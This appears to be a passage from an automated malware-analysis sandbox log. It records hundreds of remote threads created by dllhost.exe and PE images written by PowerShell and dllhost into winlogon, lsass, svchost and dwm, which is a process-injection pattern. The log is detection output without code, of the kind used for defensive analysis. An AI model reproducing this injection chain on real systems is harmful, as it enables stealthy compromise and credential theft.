Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A19B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 95FB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A1982EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 95FB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 670F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4A4B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 19A42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 670C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4A4B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 19A42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D2662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D1FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: BDCC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: BDC92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D9542EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D2C72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D8FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D2C72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CE6E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CE6B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AF662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AEFD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: B6972EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A22A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25AA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1A2F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ABA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F03D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF3C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EBEB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E1B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A7DC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0F52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CE892EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5BB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEB72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0462EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A2152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8EB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60742EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 569B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8FE62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3DC22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 99B22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 984F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 81BB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2D92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE442EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1D0E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: B6942EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 86A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1E52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A22A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2002EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25AA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 155B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1A2F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43E52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6F82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ABA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68252EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F03D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 452E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF3C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27D22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EBEB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5BE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E1B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B07C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A7DC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AE502EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0F52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B9F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3CD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43652EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CE892EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5BB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 39DF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEB72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3CF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0462EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A2152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 325C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8EB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEC32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60742EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 569B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C91C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8FE62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3DC22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 99B22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 984F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 81BB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2D92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE442EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1D0E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 86A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1E52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2002EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 155B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43E52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6F82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68252EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 452E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27D22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5BE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B07C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AE502EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B9F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3CD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43652EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 39DF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3CF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 325C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEC32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C91C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F59D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC3D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B73E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26A52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F59D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC3D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B73E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26A52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 595A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30AF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59C92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: 80B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5AEE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5CF52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3BCD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3BF02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: 6F092EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED7F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CD8E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF9E2EBC
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 1D15B040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 246EDE60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 200A19B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22E670F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
